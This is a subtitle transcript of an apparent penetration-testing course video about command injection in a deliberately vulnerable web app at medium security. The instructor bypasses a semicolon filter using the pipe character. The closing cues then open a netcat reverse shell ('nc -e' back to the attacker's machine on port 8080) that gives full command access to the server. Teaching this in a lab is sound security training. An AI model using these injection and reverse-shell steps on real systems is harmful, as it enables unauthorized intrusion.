1 00:00:02,710 --> 00:00:09,490 Okay, now that we managed to execute commands on the server using the low security settings, 2 00:00:09,580 --> 00:00:15,630 let's see if we can set it to medium and if we can do the same after increasing the security. 3 00:00:16,030 --> 00:00:21,970 So we covered the basic case, and now I'm going to go to security and I'm going to set the security 4 00:00:21,970 --> 00:00:23,390 level to medium. 5 00:00:23,530 --> 00:00:29,920 I'm going to submit this, then we're going to go back to our command execution, and I'm going to enter 6 00:00:29,920 --> 00:00:30,530 my IP. 7 00:00:30,530 --> 00:00:33,970 Now I just want to note that my IP is different now. 8 00:00:34,100 --> 00:00:41,390 If you notice, the IP of the server right now is 209, and on my machine I used to identify with ifconfig; 9 00:00:44,340 --> 00:00:47,910 you can see the IP of my Kali machine. 10 00:00:48,290 --> 00:00:50,530 So again I'm going to try to ping the Kali machine. 11 00:00:50,540 --> 00:00:53,980 Let's just first see if we can ping something. 12 00:00:53,990 --> 00:00:56,280 So we're assuming that we don't know anything about this website. 13 00:00:56,420 --> 00:01:01,540 And again, this is going from a black box point of view, so we're not going to look at the source code. 14 00:01:02,360 --> 00:01:07,040 So we're just going to run this website; it's still going to ping stuff for us. 15 00:01:07,130 --> 00:01:11,390 So I'm just going to put the IP of the Kali and see if the ping works. 16 00:01:11,540 --> 00:01:17,110 So we're just going to put 10. 17 00:01:17,180 --> 00:01:19,730 As you can see, now the ping command is working. 18 00:01:19,970 --> 00:01:26,240 Now let's see and try to do what we did before, so we used to do it with the IP 19 00:01:26,360 --> 00:01:34,130 and then you use the semicolon to say run this command and this command, and in the low security 20 00:01:34,130 --> 00:01:36,350 settings this used to work for us. 
21 00:01:36,440 --> 00:01:42,140 So we're going to submit this, and at the bottom it should show us our current working directory because 22 00:01:42,140 --> 00:01:44,110 we have the pwd here. 23 00:01:44,390 --> 00:01:47,420 So I'm submitting this. 24 00:01:47,630 --> 00:01:52,640 And as you can see, nothing got executed, so not even the ping command got executed. 25 00:01:53,020 --> 00:01:58,780 So again, looking from a black box point of view, we're going to think, oh, maybe they're using some sort 26 00:01:58,780 --> 00:02:00,500 of filtering on the semicolon. 27 00:02:00,640 --> 00:02:07,330 So they're checking if the command contains a semicolon, and then they're going to ignore that command and 28 00:02:07,360 --> 00:02:08,500 not run it. 29 00:02:08,530 --> 00:02:13,110 So we're just going to try to use another trick, or something similar to the semicolon. 30 00:02:13,300 --> 00:02:17,460 So what we used to do before: we had an example of doing ls. 31 00:02:17,710 --> 00:02:20,240 So that's the ls command. 32 00:02:20,590 --> 00:02:27,960 The pwd is what shows the working directory, and we can combine these two by putting ls, then a semicolon, 33 00:02:28,000 --> 00:02:28,270 34 00:02:28,280 --> 00:02:37,530 and then we do the pwd, and that will do both; it'll do the ls and the pwd. So that used to work 35 00:02:37,530 --> 00:02:43,950 for us but doesn't work anymore because they're probably filtering based on this specific character. 36 00:02:43,950 --> 00:02:50,520 So what we're going to do is use something else available to us in the Unix commands, which 37 00:02:50,520 --> 00:02:51,760 is the pipe. 38 00:02:51,990 --> 00:02:55,830 So the pipe is really useful when it comes to Unix; you'll use it a lot. 39 00:02:55,830 --> 00:03:00,040 What it basically does is run the first command. 
40 00:03:00,630 --> 00:03:07,230 And once you run that command, send the output, or pipe the output, to this command and run the second 41 00:03:07,230 --> 00:03:08,340 command on it. 42 00:03:09,260 --> 00:03:11,450 So essentially it runs two commands. 43 00:03:11,450 --> 00:03:17,240 In our case, now, you can use the pipe for a lot of things, and it's used in regex and things like that; for 44 00:03:17,240 --> 00:03:22,830 us all we want to do, all we're interested in, is getting the second command to run. 45 00:03:22,880 --> 00:03:25,390 So let's have an example of this. 46 00:03:25,510 --> 00:03:32,490 So we're going to do ls, which is going to be similar to our ping, and then we're going to put the pipe 47 00:03:32,490 --> 00:03:39,180 character, which is the vertical bar, and then we're going to put the second command that the ls output 48 00:03:39,330 --> 00:03:40,600 should be passed to. 49 00:03:40,680 --> 00:03:44,520 Now pwd doesn't expect any input to be passed to it. 50 00:03:44,580 --> 00:03:50,700 So at the moment, when we run this it will basically run both, but it won't show you the result of running 51 00:03:50,730 --> 00:03:51,270 ls. 52 00:03:51,300 --> 00:03:55,860 It all feeds into pwd, and we should see the result of pwd. 53 00:03:55,860 --> 00:04:04,370 So when I hit enter you will see that pwd got executed. So in our example, what's happening is we have 54 00:04:04,370 --> 00:04:09,070 a ping, then our IP, so we're going to put our IP, 55 00:04:12,120 --> 00:04:17,280 and then we're going to use the bar character, and we're going to put the second command that we want 56 00:04:17,280 --> 00:04:20,580 to run, which will be the command that will give us a shell on the server. 57 00:04:20,580 --> 00:04:23,460 But for further testing we're just going to do pwd. 58 00:04:23,640 --> 00:04:26,690 And again, as you can see, we don't see the results of the ping. 
59 00:04:26,820 --> 00:04:33,420 We only see the result of the pwd, because, again, for the third time, this command will run this and feed 60 00:04:33,420 --> 00:04:36,820 the output to pwd. 61 00:04:36,820 --> 00:04:39,850 So let's try this in here, so we're going to do: 62 00:04:40,140 --> 00:04:47,010 we put our IP again like we did before, and we used to put the semicolon like that, but I'm just going 63 00:04:47,010 --> 00:04:51,660 to put my bar character and enter, 64 00:04:54,710 --> 00:05:01,200 and as you can see the second command got executed and we got our current working directory. 65 00:05:01,210 --> 00:05:05,870 Now we can modify this to get a shell on our computer. 66 00:05:05,890 --> 00:05:11,550 So again we're going to use the bar, and we're going to get it to connect back to us. 67 00:05:11,560 --> 00:05:18,220 We're going to use the exact same method that we used last time, so we're going to do nc -e, 68 00:05:18,260 --> 00:05:28,770 with my IP, and then I'm going to put the port, which is 8080. Now, before I execute this, I'm going to 69 00:05:28,800 --> 00:05:33,570 listen on port 8080 for a connection here, and we're going to use the same command as before, using 70 00:05:33,600 --> 00:05:34,300 netcat. 71 00:05:34,710 --> 00:05:42,790 So nc -lp 8080. This is listening. 72 00:05:43,010 --> 00:05:49,370 And we're going to connect back from here to the Kali: hit submit, and sure enough we get a connection 73 00:05:49,370 --> 00:05:54,420 here that allows us to run any commands we want on the server, so we can do that. 74 00:05:54,530 --> 00:06:02,060 Now we can list the files, we can get our id, or do anything we want on the current server. 75 00:06:02,060 --> 00:06:05,270 So we basically managed to gain access to that website.